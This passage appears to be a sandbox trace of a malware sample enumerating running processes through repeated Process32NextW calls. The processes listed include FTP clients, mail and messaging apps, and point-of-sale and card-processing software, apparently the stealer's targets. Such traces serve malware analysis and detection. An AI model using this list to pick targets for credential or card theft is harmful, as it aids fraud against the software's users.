dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.241] lstrlenW (lpString="svchost.exe") returned 11 [0175.241] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.242] lstrlenW (lpString="svchost.exe") returned 11 [0175.242] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.242] lstrlenW (lpString="svchost.exe") returned 11 [0175.242] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.243] lstrlenW (lpString="svchost.exe") returned 11 [0175.243] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0175.243] lstrlenW (lpString="spoolsv.exe") returned 11 [0175.243] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.631] lstrlenW (lpString="svchost.exe") returned 11 [0175.631] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0175.633] lstrlenW (lpString="audiodg.exe") returned 11 [0175.633] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0175.634] lstrlenW (lpString="sihost.exe") returned 10 [0175.634] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.636] lstrlenW (lpString="svchost.exe") returned 11 [0175.636] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0175.644] lstrlenW (lpString="taskhostw.exe") returned 13 [0175.644] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.646] lstrlenW (lpString="explorer.exe") returned 12 [0175.646] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0175.647] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0175.647] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0175.648] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0175.649] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0175.650] lstrlenW (lpString="Memory Compression") returned 18 [0175.650] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0175.651] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0175.651] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0175.652] lstrlenW (lpString="SearchUI.exe") returned 12 [0175.652] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0175.653] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0175.653] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.654] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0175.654] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0175.655] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0175.655] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0175.656] lstrlenW (lpString="workers.exe") returned 11 [0175.656] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0175.657] lstrlenW (lpString="succeed.exe") returned 11 [0175.657] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0175.658] lstrlenW (lpString="washer jar.exe") returned 14 [0175.659] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0175.660] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0175.660] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0175.662] lstrlenW (lpString="useful_courts.exe") returned 17 [0175.662] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0175.663] lstrlenW (lpString="compounds spanish.exe") returned 21 [0175.663] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0175.665] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0175.665] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0175.666] lstrlenW (lpString="try.exe") returned 7 [0175.666] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0175.667] lstrlenW (lpString="statuteide.exe") returned 14 [0175.667] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0175.669] lstrlenW (lpString="invite.exe") returned 10 [0175.669] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0175.671] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0175.671] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0175.672] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0175.672] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0175.675] lstrlenW (lpString="modules_recommend.exe") returned 21 [0175.675] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0175.676] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0175.677] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.678] lstrlenW (lpString="svchost.exe") returned 11 [0175.678] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0175.680] lstrlenW (lpString="3dftp.exe") returned 9 [0175.680] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0175.681] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0175.682] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0175.683] lstrlenW (lpString="alftp.exe") returned 9 [0175.683] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0175.685] lstrlenW (lpString="barca.exe") returned 9 [0175.685] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0175.687] lstrlenW (lpString="bitkinex.exe") returned 12 [0175.687] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0175.689] lstrlenW (lpString="coreftp.exe") returned 11 [0175.690] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0175.692] lstrlenW (lpString="far.exe") returned 7 [0175.692] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0176.186] lstrlenW (lpString="filezilla.exe") returned 13 [0176.186] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0176.187] lstrlenW (lpString="flashfxp.exe") returned 12 [0176.187] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0176.188] lstrlenW (lpString="fling.exe") returned 9 [0176.189] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0176.190] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0176.190] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0176.191] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0176.191] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0176.192] lstrlenW (lpString="icq.exe") returned 7 [0176.192] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0176.194] lstrlenW (lpString="leechftp.exe") returned 12 [0176.194] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0176.195] lstrlenW (lpString="ncftp.exe") returned 9 [0176.195] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0176.196] lstrlenW (lpString="notepad.exe") returned 11 [0176.196] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0176.197] lstrlenW (lpString="operamail.exe") returned 13 [0176.197] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0176.198] lstrlenW (lpString="pidgin.exe") returned 10 [0176.198] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0176.198] lstrlenW (lpString="scriptftp.exe") returned 13 [0176.199] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0176.200] lstrlenW (lpString="skype.exe") returned 9 [0176.200] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0176.200] lstrlenW (lpString="smartftp.exe") returned 12 [0176.201] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0176.201] lstrlenW (lpString="thunderbird.exe") returned 15 [0176.202] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0176.203] lstrlenW (lpString="totalcmd.exe") returned 12 [0176.203] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0176.204] lstrlenW (lpString="trillian.exe") returned 12 [0176.204] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0176.205] lstrlenW (lpString="webdrive.exe") returned 12 [0176.205] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0176.206] lstrlenW (lpString="whatsapp.exe") returned 12 [0176.206] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0176.207] lstrlenW (lpString="winscp.exe") returned 10 [0176.207] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0176.208] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0176.208] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0176.209] lstrlenW (lpString="active-charge.exe") returned 17 [0176.209] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0176.210] lstrlenW (lpString="accupos.exe") returned 11 [0176.210] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0176.211] lstrlenW (lpString="afr38.exe") returned 9 [0176.211] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0176.212] lstrlenW (lpString="aldelo.exe") returned 10 [0176.212] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0176.213] lstrlenW (lpString="ccv_server.exe") returned 14 [0176.213] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0176.214] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0176.214] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0176.215] lstrlenW (lpString="creditservice.exe") returned 17 [0176.216] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0176.216] lstrlenW (lpString="edcsvr.exe") returned 10 [0176.216] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0176.217] lstrlenW (lpString="fpos.exe") returned 8 [0176.217] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0176.218] lstrlenW (lpString="isspos.exe") returned 10 [0176.218] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: 